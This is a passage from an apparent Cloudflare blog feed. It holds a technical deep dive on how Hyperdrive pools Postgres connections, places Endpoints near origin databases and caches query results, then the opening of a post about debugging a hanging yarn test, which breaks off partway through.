For a service intended to make using a database from Workers as pleasant as possible we went with the choice that balances features and performance, and designed Hyperdrive as a transaction-mode pooler. This best serves the goals of supporting a large number of short-lived clients (and therefore very high concurrency), while still supporting the transactional semantics that cause so many people to reach for an RDBMS in the first place.</p><p>In terms of this part of its design, Hyperdrive takes its cues from many pre-existing popular connection poolers, and manages operations to allow our users to focus on designing their full-stack applications. There is a configured limit to the number of connections the pool will give out, limits to how long a connection will be held idle until it is allowed to drop and return resources to the database, bookkeeping around <a href="https://blog.cloudflare.com/elephants-in-tunnels-how-hyperdrive-connects-to-databases-inside-your-vpc-networks/"><u>prepared statements</u></a> being shared across pooled connections, and other traditional concerns of the management of these resources to help ensure the origin database is able to run smoothly. These are all described in <a href="https://developers.cloudflare.com/hyperdrive/platform/limits/"><u>our documentation</u></a>.</p>
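<p>The difference between the modes comes down to when a connection goes back to the pool. A toy transaction-mode checkout, assuming a simple array-backed pool; a real pooler also handles limits, queuing, timeouts, and connection state (all names here are illustrative):</p>

```typescript
// Toy transaction-mode pooling sketch: a connection is checked out per
// query/transaction and returned the moment it finishes, so a small pool
// can serve many short-lived clients.
type Conn = { id: number; query(sql: string): Promise<string> };

class TransactionModePool {
  private idle: Conn[];
  constructor(conns: Conn[]) { this.idle = conns; }

  async run<T>(fn: (conn: Conn) => Promise<T>): Promise<T> {
    const conn = this.idle.pop();
    if (!conn) throw new Error("pool exhausted (a real pooler would queue)");
    try {
      return await fn(conn); // one query or one whole transaction
    } finally {
      this.idle.push(conn);  // back in the pool as soon as we're done
    }
  }
}
```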
    <div>
      <h2>Round and round we go</h2>
      <a href="#round-and-round-we-go">
        
      </a>
    </div>
    <p>Ok, so why build Hyperdrive then? Other poolers that solve these problems already exist — couldn’t developers using Workers just run one of those and call it a day? It turns out that connecting to regional poolers from Workers has the same major downside as connecting to regional databases: network latency and round trips.</p><p>Establishing a connection, whether to a database or a pool, requires many exchanges between the client and server. While this is true for all fully-fledged client-server databases (e.g. <a href="https://dev.mysql.com/doc/dev/mysql-server/latest/page_protocol_connection_phase.html"><u>MySQL</u></a>, <a href="https://github.com/mongodb/specifications/blob/master/source/auth/auth.md"><u>MongoDB</u></a>), we are going to focus on the <a href="https://www.postgresql.org/docs/current/protocol-flow.html#PROTOCOL-FLOW-START-UP"><u>PostgreSQL</u></a> connection protocol flow in this post. As we work through all of the steps involved, what we most want to keep track of is how many round trips it takes to accomplish. Note that we’re mostly concerned about having to wait around while these happen, so “half” round trips such as in the first diagram are not counted. This is because we can send off the message and then proceed without waiting.</p><p>The first step to establishing a connection between Postgres client and server is very familiar ground to anyone who’s worked much with networks: <a href="https://www.cloudflare.com/learning/ddos/glossary/tcp-ip/"><u>a TCP startup handshake</u></a>. Postgres uses TCP for its underlying transport, and so we must have that connection before anything else can happen on top of it.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/58qrxBsbOXbFCFBzkZFIff/19caf62d24cdbf9c4ad69bfd8286e022/image5.png" />
          </figure><p>With our transport layer in place, the next step is to <a href="https://www.postgresql.org/docs/current/protocol-flow.html#PROTOCOL-FLOW-SSL"><u>encrypt</u></a> the connection. The <a href="https://www.cloudflare.com/learning/ssl/what-happens-in-a-tls-handshake/"><u>TLS Handshake</u></a> involves some back-and-forth in its own right, though this has been reduced to just one round trip for TLS 1.3. Below is the simplest and fastest version of this exchange, but there are certainly scenarios where it can be much more complex.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5q7fVVQkB9Q43X3eaE76GP/b69c0ce964df370bd0609242f8e3de0c/image4.png" />
          </figure><p>After the underlying transport is established and secured, the application-level traffic can actually start! However, we’re not quite ready for queries, the client still needs to authenticate to a specific user and database. Again, there are multiple supported approaches that offer varying levels of speed and security. To make this comparison as fair as possible, we’re again going to consider the version that offers the fastest startup (password-based authentication).</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7KU6NHgZAW95nQyobo9Zwn/5f61d6e9ab6233186c865a9093a7f352/image8.png" />
          </figure><p>So, for those keeping score, establishing a new connection to your database takes a bare minimum of 5 round trips, and can very quickly climb from there. </p><p>While the latency of any given network round trip is going to vary based on so many factors that “it depends” is the only meaningful measurement available, some quick benchmarking during the writing of this post shows ~125 ms from Chicago to London. Now multiply that number by 5 round trips and the problem becomes evident: 625 ms to start up a connection is not viable in a distributed serverless environment. So how does Hyperdrive solve it? What if I told you the trick is that we do it all twice? To understand Hyperdrive’s secret sauce, we need to dive into Hyperdrive’s architecture.</p>
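<p>The accounting above is simple multiplication. As a sketch, using a plausible split of the five-round-trip minimum (the post counts five in total; the exact per-phase breakdown here is our assumption) and the post's own ~125 ms Chicago→London measurement:</p>

```typescript
// Back-of-the-envelope connection setup cost: blocking round trips
// multiplied by the round-trip latency between client and server.
function connectionSetupMs(roundTripMs: number): number {
  const tcpHandshake = 1;  // SYN / SYN-ACK (the trailing half trip isn't counted)
  const tlsHandshake = 1;  // TLS 1.3 best case
  const pgAuth = 3;        // assumed split: startup, password exchange, ready-for-query
  return (tcpHandshake + tlsHandshake + pgAuth) * roundTripMs;
}
```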
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/291ua8XgVnowWDOfEm05eR/a2674a9a393fcaaef8e2cfe64dd57402/image1.png" />
          </figure>
    <div>
      <h2>Impersonating a database server</h2>
      <a href="#impersonating-a-database-server">
        
      </a>
    </div>
    <p>The rest of this post is a deep dive into answering the question of how Hyperdrive does what it does. To give the clearest picture, we’re going to talk about some internal subsystems by name. To help keep everything straight, let’s start with a short glossary that you can refer back to if needed. These descriptions may not make sense yet, but they will by the end of the article.
</p><table><tr><td><p><b>Hyperdrive subsystem name</b></p></td><td><p><b>Brief description</b></p></td></tr><tr><td><p>Client</p></td><td><p>Lives on the same server as your Worker, talks directly to your database driver. This caches query results and sends queries to Endpoint if needed.</p></td></tr><tr><td><p>Endpoint</p></td><td><p>Lives in the data center nearest to your origin database, talks to your origin database. This caches query results and houses a pool of connections to your origin database.</p></td></tr><tr><td><p>Edge Validator</p></td><td><p>Sends a request to a Cloudflare data center to validate that Hyperdrive can connect to your origin database at time of creation.</p></td></tr><tr><td><p>Placement</p></td><td><p>Builds on top of Edge Validator to connect to your origin database from all eligible data centers, to identify which have the fastest connections.</p></td></tr></table><p>The first subsystem we want to dig into is named <code>Client</code>. <code>Client</code>’s first job is to pretend to be a database server. When a user’s Worker wants to connect to their database via Hyperdrive, they use a special connection string that the Worker runtime generates on the fly. This tells the Worker to reach out to a Hyperdrive process running on the same Cloudflare server, and direct all traffic to and from the database client to it.</p>
            <pre><code>import postgres from "postgres";

// Connect to Hyperdrive
const sql = postgres(env.HYPERDRIVE.connectionString);

// sql will now talk over an RPC channel to Hyperdrive, instead of via TCP to Postgres</code></pre>
            <p>Once this connection is established, the database driver will perform the usual handshake expected of it, with our <code>Client</code> playing the role of a database server and sending the appropriate responses. All of this happens on the same Cloudflare server running the Worker, and we observe that the p90 for all this is 4 ms (p50 is 2 ms). Quite a bit better than 625 ms, but how does that help? The query still needs to get to the database, right?</p><p><code>Client</code>’s second main job is to inspect the queries sent from a Worker, and decide whether they can be served from Cloudflare’s cache. We’ll talk more about that later on. Assuming that there are no cached query results available, <code>Client</code> will need to reach out to our second important subsystem, which we call <code>Endpoint</code>.</p>
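<p>A sketch of the kind of check <code>Client</code> might make when inspecting queries. Hyperdrive's actual cacheability rules are more involved; the <code>isCacheable</code> function and its heuristics here are illustrative:</p>

```typescript
// Illustrative cacheability check: only read-only queries with no
// obviously volatile functions are candidates for the query cache.
function isCacheable(query: string): boolean {
  const q = query.trim().toLowerCase();
  if (!q.startsWith("select")) return false;     // writes are never cached
  const volatile = ["now()", "random()", "current_timestamp"];
  return !volatile.some((fn) => q.includes(fn)); // volatile results can't be reused
}
```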
    <div>
      <h2>In for the long haul</h2>
      <a href="#in-for-the-long-haul">
        
      </a>
    </div>
    <p>Before we dig into the role <code>Endpoint</code> plays, it’s worth talking more about how the <code>Client→Endpoint</code> connection works, because it’s a key piece of our solution. We have already talked a lot about the price of network round trips, and how a Worker might be quite far away from the origin database, so how does Hyperdrive handle the long trip from the <code>Client</code> running alongside their Worker to the <code>Endpoint</code> running near their database without expensive round trips?</p><p>This is accomplished with a very handy bit of Cloudflare’s networking infrastructure. When <code>Client</code> gets a cache miss, it will submit a request to our networking platform for a connection to whichever data center <code>Endpoint</code> is running on. This platform keeps a pool of ready TCP connections between all of Cloudflare’s data centers, such that we don’t need to do any preliminary handshakes to begin sending application-level traffic. You might say we put a connection pooler in our connection pooler.</p><p>Over this TCP connection, we send an initialization message that includes all of the buffered query messages the Worker has sent to <code>Client</code> (the mental model would be something like a <code>SYN</code> and a payload all bundled together). <code>Endpoint</code> will do its job processing this query, and respond by streaming the response back to <code>Client</code>, leaving the streaming channel open for any followup queries until <code>Client</code> disconnects. This approach allows us to send queries around the world with zero wasted round trips.</p>
    <div>
      <h2>Impersonating a database client</h2>
      <a href="#impersonating-a-database-client">
        
      </a>
    </div>
    <p><code>Endpoint</code> has a couple different jobs it has to do. Its first job is to pretend to be a database client, and to do the client half of the handshake shown above. Second, it must also do the same query processing that <code>Client</code> does with query messages. Finally, <code>Endpoint</code> will make the same determination on when it needs to reach out to the origin database to get uncached query results.</p><p>When <code>Endpoint</code> needs to query the origin database, it will attempt to take a connection out of a limited-size pool of database connections that it keeps. If there is an unused connection available, it is handed out from the pool and used to ferry the query to the origin database, and the results back to <code>Endpoint</code>. Once <code>Endpoint</code> has these results, the connection is immediately returned to the pool so that another <code>Client</code> can use it. These warm connections are usable in a matter of microseconds, which is obviously a dramatic improvement over the round trips from one region to another that a cold startup handshake would require.</p><p>If there are no currently unused connections sitting in the pool, it may start up a new one (assuming the pool has not already given out as many connections as it is allowed to). This set of handshakes looks exactly the same as the one <code>Client</code> does, but it happens across the network between a Cloudflare data center and wherever the origin database happens to be. These are the same 5 round trips as our original example, but instead of a full Chicago→London path on every single trip, perhaps it’s Virginia→London, or even London→London. Latency here will depend on which data center <code>Endpoint</code> is being housed in.</p>
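<p>The checkout logic described above can be sketched as: hand out an idle connection if one exists, dial a new one if the pool is under its limit, otherwise make the caller wait. All names here are illustrative, and the real pool also handles queuing, health checks, and idle timeouts:</p>

```typescript
// Toy bounded pool: warm connections are reused in microseconds; a cold
// start pays the full handshake (the 5+ round trips described above).
type OriginConn = { id: number };

class BoundedPool {
  private idle: OriginConn[] = [];
  private total = 0;
  constructor(private max: number, private dial: () => Promise<OriginConn>) {}

  async acquire(): Promise<OriginConn> {
    const conn = this.idle.pop();
    if (conn) return conn;            // warm connection: no handshake needed
    if (this.total < this.max) {
      this.total++;
      return await this.dial();       // cold start: full handshake to the origin
    }
    throw new Error("pool at capacity (a real pooler would queue the request)");
  }

  release(conn: OriginConn): void {
    this.idle.push(conn);             // returned as soon as results are in hand
  }
}
```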
    <div>
      <h2>Distributed choreography</h2>
      <a href="#distributed-choreography">
        
      </a>
    </div>
    <p>Earlier, we mentioned that Hyperdrive is a transaction-mode pooler. This means that when a driver is ready to send a query or open a transaction it must get a connection from the pool to use. The core challenge for a transaction-mode pooler is in aligning the state of the driver with the state of the connection checked out from the pool. For example, if the driver thinks it’s in a transaction, but the database doesn’t, then you might get errors or even corrupted results.</p><p>Hyperdrive achieves this by ensuring all connections are in the same state when they’re checked out of the pool: idle and ready for a query. Where Hyperdrive differs from other transaction-mode poolers is that it does this dance of matching up the states of two different connections across machines, such that there’s no need to share state between <code>Client</code> and <code>Endpoint</code>! Hyperdrive can terminate the incoming connection in <code>Client</code> on the same machine running the Worker, and pool the connections to the origin database wherever makes the most sense.</p><p>The job of a transaction-mode pooler is a hard one. Database connections are fundamentally stateful and keeping track of that state is important to maintain our guise when impersonating either a database client or a server. As an example, one of the trickier pieces of state to manage is <a href="https://www.postgresql.org/docs/current/protocol-overview.html#PROTOCOL-QUERY-CONCEPTS"><u>prepared statements</u></a>. When a user creates a new prepared statement, the prepared statement is only created on whichever database connection happened to be checked out at that time. Once the user finishes the transaction or query they are processing, the connection holding that statement is returned to the pool. From the user’s perspective they’re still connected using the same database connection, so a new query or transaction can reasonably expect to use that previously prepared statement. 
If a different connection is handed out for the next query and the query wants to make use of this resource, the pooler has to do something about it. We went into some depth on this topic in a <a href="https://blog.cloudflare.com/postgres-named-prepared-statements-supported-hyperdrive/"><u>previous blog post</u></a> when we released this feature, but in sum, the process looks like this:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2ibtnO4URpLJ6m3Nyd2kpW/331059a6fd18c7d70b95a15af8f57cd6/image2.png" />
          </figure><p>Hyperdrive implements this by keeping track of what statements have been prepared by a given client, as well as what statements have been prepared on each origin connection in the pool. When a query comes in expecting to re-use a particular prepared statement (#8 above), Hyperdrive checks if it’s been prepared on the checked-out origin connection. If it hasn’t, Hyperdrive will replay the wire-protocol message sequence to prepare it on the newly-checked-out origin connection (#10 above) before sending the query over it. Many little corrections like this are necessary to keep the client’s connection to Hyperdrive and Hyperdrive’s connection to the origin database lined up so that both sides see what they expect.</p>
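<p>The bookkeeping described above can be sketched with two maps: one tracking what the client has prepared, one tracking what each origin connection has prepared. The class, names, and the <code>replayPrepare</code> callback are illustrative, not Hyperdrive's internals:</p>

```typescript
// Illustrative prepared-statement reconciliation: before running a query
// that references a named statement, make sure the statement has been
// prepared on the origin connection we just checked out.
class PreparedStatementTracker {
  // statement name -> SQL text, as prepared by the client
  private clientStatements = new Map<string, string>();
  // origin connection id -> names of statements prepared on it
  private originStatements = new Map<number, Set<string>>();

  recordClientPrepare(name: string, sql: string): void {
    this.clientStatements.set(name, sql);
  }

  async ensurePrepared(
    connId: number,
    name: string,
    replayPrepare: (name: string, sql: string) => Promise<void>,
  ): Promise<void> {
    const prepared = this.originStatements.get(connId) ?? new Set<string>();
    if (!prepared.has(name)) {
      const sql = this.clientStatements.get(name);
      if (sql === undefined) throw new Error(`unknown prepared statement: ${name}`);
      await replayPrepare(name, sql); // replay the wire-protocol prepare sequence
      prepared.add(name);
      this.originStatements.set(connId, prepared);
    }
  }
}
```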
    <div>
      <h2>Better, faster, smarter, closer</h2>
      <a href="#better-faster-smarter-closer">
        
      </a>
    </div>
    <p>This “split connection” approach is the founding innovation of Hyperdrive, and one of the most vital aspects of it is how it affects starting up new connections. While the same 5+ round trips must always happen on startup, the actual time spent on the round trips can be dramatically reduced by conducting them over the smallest possible distances. The impact of distance can be so big that there is still a huge latency reduction even though the startup round trips must now happen <i>twice</i> (once each between the Worker and <code>Client</code>, and <code>Endpoint</code> and your origin database). So how do we decide where to run everything, to lean into that advantage as much as possible?</p><p>The placement of <code>Client</code> has not really changed since the original design of Hyperdrive. Sharing a server with the Worker sending the queries means that the Worker runtime can connect directly to Hyperdrive with no network hop needed. While there is always room for micro-optimizations, it’s hard to do much better than that from an architecture perspective. By far the bigger piece of the latency puzzle is where to run <code>Endpoint</code>.</p><p>Hyperdrive keeps a list of data centers that are eligible to house <code>Endpoint</code>s, requiring that they have sufficient capacity and the best routes available for pooled connections to use. The key challenge to overcome here is that a <a href="https://www.postgresql.org/docs/current/libpq-connect.html#LIBPQ-CONNSTRING-URIS"><u>database connection string</u></a> does not tell you where in the world a database actually is. The reality is that reliably going from a hostname to a precise (enough) geographic location is a hard problem, even leaving aside the additional complexity of doing so <a href="https://blog.cloudflare.com/elephants-in-tunnels-how-hyperdrive-connects-to-databases-inside-your-vpc-networks/"><u>within a private network</u></a>. 
So how do we pick from that list of eligible data centers?</p><p>For much of the time since its launch, Hyperdrive solved this with a regional pool approach. When a Worker connected to Hyperdrive, the location of the Worker was used to infer what region the end user was connecting from (e.g. ENAM, WEUR, APAC, etc. — see a rough breakdown <a href="https://www.cloudflare.com/network/"><u>here</u></a>). Data centers to house <code>Endpoint</code>s for any given Hyperdrive were deterministically selected from that region’s list of eligible options using <a href="https://en.wikipedia.org/wiki/Rendezvous_hashing"><u>rendezvous hashing</u></a>, resulting in one pool of connections <i>per region</i>.</p><p>This approach worked well enough, but it had some severe shortcomings. The first and most obvious is that there’s no guarantee that the data center selected for a given region is actually closer to the origin database than the user making the request. This means that, while you’re getting the benefit of the excellent routing available on <a href="https://www.cloudflare.com/network/"><u>Cloudflare's network</u></a>, you may be going significantly out of your way to do so. The second downside is that, in the scenario where a new connection must be created, the round trips to do so may be happening over a significantly larger distance than is necessary if the origin database is in a different region than the <code>Endpoint</code> housing the regional connection pool. This increases latency and reduces throughput for the query that needs to instantiate the connection.</p><p>The final key downside here is an unfortunate interaction with <a href="https://developers.cloudflare.com/workers/configuration/smart-placement/"><u>Smart Placement</u></a>, a feature of Cloudflare Workers that analyzes the duration of your Worker requests to identify the data center to run your Worker in. 
With regional <code>Endpoint</code>s, the best Smart Placement can possibly do is to put your requests close to the <code>Endpoint</code> for whichever region the origin database is in. Again, there may be other data centers that are closer, but Smart Placement has no way to do better than where the <code>Endpoint</code> is because all Hyperdrive queries must route through it.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3y9r3Dwn6APp5Pw6kqkg0Z/3a9e202670b6c65a22294fe777064add/image6.png" />
          </figure><p>We recently <a href="https://developers.cloudflare.com/changelog/2025-03-04-hyperdrive-pooling-near-database-and-ip-range-egress/"><u>shipped some improvements</u></a> to this system that significantly enhanced performance. The new system discards the concept of regional pools entirely, in favor of a single global <code>Endpoint</code> for each Hyperdrive, housed in the eligible data center as close as possible to the origin database.</p><p>The way we solved the problem of locating the origin database was ultimately very straightforward. We already had a subsystem to confirm, at the time of creation, that Hyperdrive could connect to an origin database using the provided information. We call this subsystem our <code>Edge Validator</code>.</p><p>It’s a bad user experience to let someone create a Hyperdrive, only to find out when they go to use it that they mistyped their password or something. Now they’re stuck trying to debug with extra layers in the way, with a Hyperdrive that can’t possibly work. Instead, whenever a Hyperdrive is created, the <code>Edge Validator</code> will send a request to an arbitrary data center to use its instance of Hyperdrive to connect to the origin database. If this connection fails, the creation of the Hyperdrive will also fail, giving immediate feedback to the user at the time it is most helpful.</p><p>With our new subsystem, affectionately called <code>Placement</code>, we now have a solution to the geolocation problem. After <code>Edge Validator</code> has confirmed that the provided information works and the Hyperdrive is created, an extra step is run in the background. <code>Placement</code> will perform the exact same connection routine, except instead of being done once from an arbitrary data center, it is run a handful of times from every single data center that is eligible to house <code>Endpoint</code>s. 
The latency of establishing these connections is collected, and the average is sent back to a central instance of <code>Placement</code>. The data centers that can connect to the origin database the fastest are, by definition, where we want to run <code>Endpoint</code> for this Hyperdrive. The list of these is saved, and at runtime is used to select the <code>Endpoint</code> best suited to housing the pool of connections to the origin database.</p><p>Given that the secret sauce of Hyperdrive is in managing and minimizing the latency of establishing these connections, moving <code>Endpoint</code>s right next to their origin databases proved to be pretty impactful.</p>
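<p>To make the selection step concrete, here is a minimal sketch of ranking candidate data centers by their average measured connection latency, in the spirit of the measurement described above. The data shapes (a map of latency sample arrays keyed by data center name) are invented for illustration and are not <code>Placement</code>'s real internals.</p>

```javascript
// samples: Map from data-center name to an array of connection-setup times (ms)
function rankDataCenters(samples) {
  const averages = [];
  for (const [dc, times] of samples) {
    const avg = times.reduce((sum, t) => sum + t, 0) / times.length;
    averages.push({ dc, avg });
  }
  // Fastest average first: by definition, the best homes for this
  // Hyperdrive's Endpoint.
  averages.sort((a, b) => a.avg - b.avg);
  return averages.map(({ dc }) => dc);
}
```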
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1MZpaxXjj4tlOAinZkDqOF/e1a555a47141ac11aa391d27806cbfbc/image9.png" />
          </figure><p><sup><i>Pictured: query latency as measured from Endpoint to origin databases. The backfill of Placement to existing customers was done in stages on 02/22 and 02/25.</i></sup></p>
    <div>
      <h2>Serverless drivers exist, though?</h2>
      <a href="#serverless-drivers-exist-though">
        
      </a>
    </div>
    <p>While we went in a different direction, it’s worth acknowledging that other teams have <a href="https://neon.tech/blog/quicker-serverless-postgres"><u>solved this same problem</u></a> with a very different approach. Custom database drivers, usually called “serverless drivers”, have made several optimization efforts to reduce both the number of round trips and how quickly they can be conducted, while still connecting directly from your client to your database in the traditional way. While these drivers are impressive, we chose not to go this route for a couple of reasons.</p><p>First off, a big part of the appeal of using Postgres is its <a href="https://www.lastweekinaws.com/podcast/screaming-in-the-cloud/the-ever-growing-ecosystem-of-postgres-with-alvaro-hernandez/"><u>vibrant ecosystem</u></a>. Odds are good you’ve used Postgres before, and it can probably help solve whichever problem you’re tackling with your newest project. This familiarity and shared knowledge across projects is an absolute superpower. We wanted to lean into this advantage by supporting the most popular drivers already in this ecosystem, instead of fragmenting it by adding a competing one.</p><p>Second, Hyperdrive also functions as a cache for individual queries (a bit of trivia: its name while still in Alpha was actually <code>sql-query-cache</code>). Doing this as effectively as possible for distributed users requires some clever positioning of where exactly the query results should be cached. One of the unique advantages of running a distributed service on Cloudflare’s network is that we have a lot of flexibility on where to run things, and can confidently surmount challenges like those. If we’re going to be playing three-card monte with where things are happening anyway, it makes the most sense to favor that route for solving the other problems we’re trying to tackle too.</p>
    <div>
      <h2>Pick your favorite cache pun</h2>
      <a href="#pick-your-favorite-cache-pun">
        
      </a>
    </div>
    <p>As we’ve <a href="https://blog.cloudflare.com/postgres-named-prepared-statements-supported-hyperdrive/"><u>talked about</u></a> in the past, Hyperdrive buffers protocol messages until it has enough information to know whether a query can be served from cache. In a post about how Hyperdrive works it would be a shame to skip talking about how exactly we cache query results, so let’s close by diving into that.</p><p>First and foremost, Hyperdrive uses <a href="https://developers.cloudflare.com/cache/"><u>Cloudflare's cache</u></a>, because when you have technology like that already available to you, it’d be silly not to use it. This has some implications for our architecture that are worth exploring.</p><p>The cache exists in each of Cloudflare’s data centers, and by default these are separate instances. That means that a <code>Client</code> operating close to the user has one, and an <code>Endpoint</code> operating close to the origin database has one. However, historically we weren’t able to take full advantage of that, because the logic for interacting with cache was tightly bound to the logic for managing the pool of connections.</p><p>Part of our recent architecture refactoring effort, where we switched to global <code>Endpoint</code>s, was to split up this logic such that we can take advantage of <code>Client</code>’s cache too. This was necessary because, with <code>Endpoint</code> moving to a single location for each Hyperdrive, users from other regions would otherwise have gotten cache hits served from almost as far away as the origin.</p><p>With the new architecture, the role of <code>Client</code> during active query handling transitioned from that of a “dumb pipe” to more like what <code>Endpoint</code> had always been doing. It now buffers protocol messages, and serves results from cache if possible. 
In those scenarios, Hyperdrive’s traffic never leaves the data center that the Worker is running in, reducing query latencies from 20-70 ms to an average of around 4 ms. As a side benefit, it also substantially reduces the network bandwidth Hyperdrive uses to serve these queries. A win-win!</p><p>In the scenarios where query results can’t be served from the cache in <code>Client</code>’s data center, all is still not lost. <code>Endpoint</code> may also have cached results for this query, because it can field traffic from many different <code>Client</code>s around the world. If so, it will provide these results back to <code>Client</code>, along with how much time is remaining before they expire, such that <code>Client</code> can both return them and store them correctly into its own cache. Likewise, if <code>Endpoint</code> does need to go to the origin database for results, they will be stored into both <code>Client</code> and <code>Endpoint</code> caches. This ensures that followup queries from that same <code>Client</code> data center will get the happy path with single-digit ms response times, and also reduce load on the origin database from any other <code>Client</code>’s queries. This functions similarly to how <a href="https://developers.cloudflare.com/cache/how-to/tiered-cache/"><u>Cloudflare's Tiered Cache</u></a> works, with <code>Endpoint</code>’s cache functioning as a final layer of shielding for the origin database.</p>
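<p>The two-layer lookup described above can be sketched roughly as follows. Every class and function name here is invented for illustration; Hyperdrive's real interfaces are not public and differ from this.</p>

```javascript
// A toy TTL cache standing in for one data center's cache instance.
class TtlCache {
  constructor() { this.entries = new Map(); }
  get(key, now) {
    const hit = this.entries.get(key);
    if (!hit || hit.expiresAt <= now) return null;
    return { value: hit.value, remainingTtl: hit.expiresAt - now };
  }
  set(key, value, ttl, now) {
    this.entries.set(key, { value, expiresAt: now + ttl });
  }
}

function runQuery(sql, clientCache, endpointCache, origin, now, ttl) {
  // 1. Happy path: served from the cache in the Worker's own data center.
  const local = clientCache.get(sql, now);
  if (local) return { value: local.value, servedFrom: 'client' };

  // 2. Endpoint may hold results cached on behalf of Clients elsewhere.
  //    It hands back the remaining TTL so Client can cache them correctly.
  const remote = endpointCache.get(sql, now);
  if (remote) {
    clientCache.set(sql, remote.value, remote.remainingTtl, now);
    return { value: remote.value, servedFrom: 'endpoint' };
  }

  // 3. Miss everywhere: hit the origin database and fill both layers.
  const value = origin(sql);
  endpointCache.set(sql, value, ttl, now);
  clientCache.set(sql, value, ttl, now);
  return { value, servedFrom: 'origin' };
}
```

<p>The Endpoint-side cache plays the shielding role: a second Client in a different data center misses locally but still avoids touching the origin database.</p>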
    <div>
      <h2>Come on in, the water’s fine!</h2>
      <a href="#come-on-in-the-waters-fine">
        
      </a>
    </div>
    <p>With this announcement of a Free Plan for Hyperdrive, and newly armed with the knowledge of how it works under the hood, we hope you’ll enjoy building your next project with it! You can get started with a single Wrangler command (or using the dashboard):</p>
            <pre><code>wrangler hyperdrive create postgres-hyperdrive \
--connection-string="postgres://user:password@db-host.example.com:5432/defaultdb"</code></pre>
            <p>We’ve also included a Deploy to Cloudflare button below to let you get started with a sample Worker app using Hyperdrive: just bring your existing Postgres database! If you have any questions or ideas for future improvements, please feel free to visit our <a href="https://discord.com/channels/595317990191398933/1150557986239021106"><u>Discord channel!</u></a></p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/cloudflare/templates/tree/main/postgres-hyperdrive-template"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p></p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Hyperdrive]]></category>
            <category><![CDATA[Smart Placement]]></category>
            <category><![CDATA[SQL]]></category>
            <guid isPermaLink="false">3YedZXQKWaCm2jUQPvAeQv</guid>
            <dc:creator>Andrew Repp</dc:creator>
            <dc:creator>Matt Alonso</dc:creator>
        </item>
        <item>
            <title><![CDATA[A steam locomotive from 1993 broke my yarn test]]></title>
            <link>https://blog.cloudflare.com/yarn-test-suffers-strange-derailment/</link>
            <pubDate>Wed, 02 Apr 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Yarn tests fail consistently at the 27-second mark. The usual suspects are swiftly eliminated. A deep dive is taken to comb through traces, only to be derailed into an unexpected crash investigation. ]]></description>
            <content:encoded><![CDATA[ <p>So the story begins with a pair programming session I had with my colleague, which I desperately needed because my node skill tree is still at level 1, and I needed to get started with React because I'll be working on our internal <a href="https://github.com/backstage/backstage"><u>backstage</u></a> instance.</p><p>We worked together on a small feature, tested it locally, and it worked. Great. Now it's time to make My Very First React Commit. So I ran the usual <code>git add</code> and <code>git commit</code>, which hooked into <code>yarn test</code> to automatically run unit tests for backstage, and that's when <i>everything got derailed</i>. For all the React tutorials I have followed, I have never actually run a <code>yarn test</code> on <i>my machine</i>. And the first time I tried <code>yarn test</code>, it hung, and after a long time the command eventually failed:</p>
            <pre><code>Determining test suites to run...

  ● Test suite failed to run

thrown: [Error]

error Command failed with exit code 1.
info Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.
🌈  backstage  ⚡</code></pre>
            <p>I could tell it was obviously unhappy about something, and then it threw some [Error]. I have very little actual JavaScript experience, but this looks suspiciously like someone had neglected to write a proper toString() or whatever, and thus we're stuck with the monumentally unhelpful [Error]. Searching the web yielded an entire ocean of false positives due to how vague the error message is. <i>What a train wreck!</i></p><p>Fine, let's put on our troubleshooting hats. My memory is not perfect, but thankfully shell history is. Let's see all the (ultimately useless) things that were tried (with commentary):</p>
            <pre><code>2025-03-19 14:18  yarn test --help                                                                                                  
2025-03-19 14:20  yarn test --verbose                    
2025-03-19 14:21  git diff --staged                                                                                                 
2025-03-19 14:25  vim README.md                    # Did I miss some setup?
2025-03-19 14:28  i3lock -c 336699                 # "I need a drink"            
2025-03-19 14:34  yarn test --debug                # Debug, verbose, what's the diff
2025-03-19 14:35  yarn backstage-cli repo test     # Maybe if I invoke it directly ...
2025-03-19 14:36  yarn backstage-cli --version     # Nope, same as mengnan's
2025-03-19 14:36  yarn backstage-cli repo --help
2025-03-19 14:36  yarn backstage-cli repo test --since HEAD~1   # Minimal changes?
2025-03-19 14:36  yarn backstage-cli repo test --since HEAD     # Uhh idk no changes???
2025-03-19 14:38  yarn backstage-cli repo test plugins          # The first breakthrough. More on this later
2025-03-19 14:39  n all tests.\n › Press f to run only failed tests.\n › Press o to only run tests related to changed files.\n › Pres
filter by a filename regex pattern.\n › Press t to filter by a test name regex pattern.\n › Press q to quit watch mode.\n › Press Ent
rigger a test run all tests.\n › Press f to run only failed tests.\n › Press o to only run tests related to changed files.\n › Press
lter by a filename regex pattern.\n › Press t to filter by a test name regex pattern.\n › Press q to quit watch mode.\n › Press Enter
gger a test ru                                     # Got too excited and pasted rubbish
2025-03-19 14:44  ls -a | fgrep log
2025-03-19 14:44  find | fgrep log                 # Maybe it leaves a log file?
2025-03-19 14:46  yarn backstage-cli repo test --verbose --debug --no-cache plugins    # "clear cache"
2025-03-19 14:52  yarn backstage-cli repo test --no-cache --runInBand .                # No parallel
2025-03-19 15:00  yarn backstage-cli repo test --jest-help
2025-03-19 15:03  yarn backstage-cli repo test --resetMocks --resetModules plugins     # I have no idea what I'm resetting</code></pre>
            <p>The first real breakthrough was <code>test plugins</code>, which runs only tests matching "plugins". This effectively bypassed the "determining suites to run..." logic, which was the thing that was hanging. So, I am now able to get tests to run. However, these too eventually crash with the same cryptic <code>[Error]</code>:</p>
            <pre><code>PASS   @cloudflare/backstage-components  plugins/backstage-components/src/components/Cards/TeamMembersListCard/TeamMembersListCard.test.tsx (6.787 s)
